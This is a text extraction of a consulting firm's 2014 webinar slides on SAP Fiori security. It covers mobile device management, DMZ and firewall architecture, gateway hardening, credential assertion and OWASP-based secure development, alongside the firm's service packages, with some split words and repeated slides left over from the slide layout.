webinar - critical security considerations for fiori deployments
TRANSCRIPT
Guidelines for Securing Fiori Solutions
19 October 2014BENIMBL.COM
Gary Prewett– Practice Lead SAP SecuritySarah Lottman – Practice Lead SAP User Experience
our Curriculum vitae
2009 14x
1Year Founded
Supporting both the Fortune 500 and Midmarket
Growth since inception
SAP Specialized – No other ERP
5280Headquartered in the Mile-High City –Denver, Colorado
174+ Amazing Customers… and counting!!
100+
7+
Consultants Strong
Average years of SAP Expertise per consultant
15+Market Verticals Supported
98%Client
Satisfaction
2
Our Services
Enhanced and consistent SAP User Experience across Computer, Tablet, and Smartphone.
Fiori Denver-based SAP delivery for Break/Fix Enhancement, and Project.
SAP AMSHarness the power of SAP HANA with the SAP Business Suite on HANA.
hana
Empower your workforce and business via SAP mobilization.
MobilityEnd-to-end SAP and HP Testing services across HP ALM, UFT, LoadRunner, and StormRunner.
SAP + HP testingRun IT like a Factory thru Solution Manager’s ITIL ALM Product Suite.
Solution Manager
Classic Basis, TDMS, LVM, EHP, Netweaver, and landscape consulting.
ADMIN + INFRASTRUCTURE
Comprehensive SAP risk mitigation via Audit, toolset, or pure consulting services.
securityDelivery from idea thru hypercare whether laser-focused or complete project.
projects
Connect systems via PI, PO, WebServices, 3rd party Middleware, etc. via seamless connectivity.
integration
Maximize your SAP investment with SAP’s latest and greatest functionality via EHP application.
Enhancement pack
Easily replicate data whenever you want from source to target system (Prod > QA, Prod > Training)!
tdms
4
FIORI and Security Overview1
AGENDA
Endpoint Security2
Architecting for Security3
Security Configuration4
Authentication and Authorization5
Secure Software Development6
More Information7
Fiori And Security Overview
55
SAP’s new user experience technology
Fast Facts
Heavy investments made in SAP Fiori and UI5 and providing a next generation user experience 300+ prebuilt applications that run on ERP, CRM, SRM, HANA and more
SAP’s UI of the future
Run Anywhere Fiori allows you to run anywhere – Desktop, Tablet and Mobile Devices Full security of Netweaver: Runs on Mobile Portal, Sybase Unwired Platform and Web Browser
Flexibility Enhancement Framework allows for modification to suit customer’s needs Fiori is built on open-source SAPUI5; which gives us the ability to build fully customized Fiori
applications
Easy branding The new SAP UI Add-on allows for Company Brands and customer themes easily Built on open web standards such as HTML5 and CSS3, which allows for full modification
Customizable Apps for a Customized Experience
Security Framework: Security Program Scope
8
Network Architecture
Secure Configuration
Encrypted Communication
Endpoint Security
Secure Software
Development
Vulnerability Management
Authorization
Authentication
Track and Monitor
Regularly Test
Monitoring
Maintain Policy
Security Framework: Security Program Scope
9
Network Architecture
Secure Configuration
Encrypted Communication
Endpoint Security
Secure Software
Development
Vulnerability Management
Authorization
Authentication
Track and Monitor
Regularly Test
Monitoring
Maintain Policy
Endpoint Security
10
Security Overview – Mobile Threat Trends
Remote Access Trojans (RATs) started appearing in 2013, increasingly sophisticated in 2014 Delivered by packaging with legitimate app Java-based delivery via spear phishing attacks
Mobile Malware
Track user (30%) Steal information (28%) Traditional threats (backdoors and downloaders) 20%
Mobile Threat Classifications (2013)
Apple iOS iPhone / iPad – 108 Android – 17 Blackberry - 1 Nokia - 1
Mobile Vulnerabilities (2013)
Source: Internet Security Threat Report 2014. Symantec, 2014. http://www.symantec.com/content/en/us/enterprise/other_resources/b-istr_main_report_v19_21291018.en-us.pdf
Mobile Security Management Options
SAP Afaria – Mobile Device Management Device and Security Management Incident Management Capabilities Device Configuration and Support tools Fiori Client App Provisioning and Management Granular Mobile Device Security Policies
Existing MDM tools can also be leveraged:• AirWatch• Good Technology• McAfee• Symantec
SAP Mobile App Protection by Mocana A compelling option in a “BYOD” environment Treats the mobile device as semi-trusted Data at rest encryption for SAP Fiori Client application Restrictions on device cut and paste functionality Encrypted 256-bit encrypted tunnel (to the Fiori Client) Remote application wipe capabilities
Architecting for Security
1313
Infrastructure considerations
Afaria Back End
Bac
ken
d D
ata
So
urc
es
ERP
CRM
DMZ
Fir
ew
all
Afaria Server
Fir
ew
all
We
b A
pp
licat
ion
Fir
ew
all
Web Dispatcher
NetWeaver Gateway
You always want to terminate
connections and enforce business
logic here!Good idea to have
42
Key Architectural Design Considerations
Use firewalls to minimize application attack surface areas Useful for scoping from an audit perspective
Firewalls
Location to terminate connection originating outside of your four walls Some business logic should be enforced here Systems here should be treated as semi-trusted
DMZ
Give you real-time visibility into attacks and attack trends Can be leveraged to
Web Application Firewalls
Reverse Proxy only! Offers absolutely no protection for common application-specific attacks
Injection XSS XSRF
Web Dispatcher
Security Configuration
1616
42
Security Configuration Considerations
Endpoint Security
Authentication (can leverage all NetWeaver 7.4 authentication options) Standard application server hardening Implement gateway services hardening Minimize ICF services enabled (can restrict if needed internally using the Web Dispatcher) RFC security hardening Ensure encryption is enabled for:
Web traffic SSO tickets (if in scope) RFC connections
NetWeaver gateway Security
Application Security
Authentication and Authorization
1818
1919
ERP
DMZ
Web Dispatcher
NetWeaver Gateway
Authentication and Authorization Example
Fir
ew
all
We
b A
pp
licat
ion
Fir
ew
all
Fir
ew
all
Todd Witter
Gateway Credentials:
ERP Asserted Credentials:
Credentials asserted
2020
Authentication and Authorization Assignment Workflow
Credentials Asserted to
Gateway
Gateway Application
Role Assigned
Auth types supported:• Basic• SAML• X.509
Certificates
Accepted?Credentials Asserted to
ERP
• Trusted RFCs used• With trust
relationship, ERP maps credentials on Gateway to ERP Credentials
• Security posture for Gateway needs to equal the security posture on the backend!
ERP ODATA Roles
Assigned
• ABAP Roles, copied from SAP-delivered roles and modified (PFCG)
• ABAP Roles, copied from SAP-delivered roles and modified (PFCG)
Yes
Secure Fiori Development
2121
OWASP – A Great Resource to Stay Current
A1 – Injection A2 – Broken Authentication and Session Management A3 – Cross Site Scripting A4 – Insecure Direct Object Reference A5 – Security misconfiguration A6 – Sensitive Data Exposure A7 – Missing Function Level Access Control A8 – Cross Site Request Forgery A9 – Using Components with Known Vulnerabilities A10 – Unvalidated Redirects and Forwards
OWASP – Top ten Web Application Vulnerabilities (2013)
Follow ABAP best practices (avoid call transaction, kernel don’t pass user input into opensql statements without validation, etc.)
Use Code Inspector to catch ABAP-specific vulnerabilities
Educate Fiori developers on common web application vulnerabilities (train on “Protecting SAP Applications” guide
Best Practices for Fiori Apps
https://support.sap.com/content/dam/library/support/support-programs-services/support-services/Protecting-SAP-Apps.pdf
Nimbl does Fiori
2323
42
Fiori roadmap
Endpoint Security
Authentication (can leverage all NetWeaver 7.4 authentication options) Standard application server hardening Implement gateway services hardening Minimize ICF services enabled (can restrict if needed internally using the Web Dispatcher) RFC security hardening Ensure encryption is enabled for:
Web traffic SSO tickets (if in scope) RFC connections
NetWeaver gateway Security
Application Security
Fiori Roadmap
Ideal for those customers who want specific pain points addressed
80 hours – mix of onsite/offsite delivery
Outcome:• Personalized Fiori Demo – hands on• Architecture Document• Recommendations for Fiori Applications to be delivered• Custom Fiori Application suggestions – with wireframes• Specifics on theming and branding to increase usability
Fiori jumpstart package
Ideal for those customers who want to rapidly deploy Fiori
6 weeks – mix of onsite/offsite delivery
Outcome:• Two NetWeaver 7.4 ABAP Installations• Ten SAP delivered Transactional Fiori Applications• Gateway Configuration and Security Hardening• Configuration of Fiori Launchpad• Configuration guides with screenshots for each activity• Fiori Development Workstation installation guide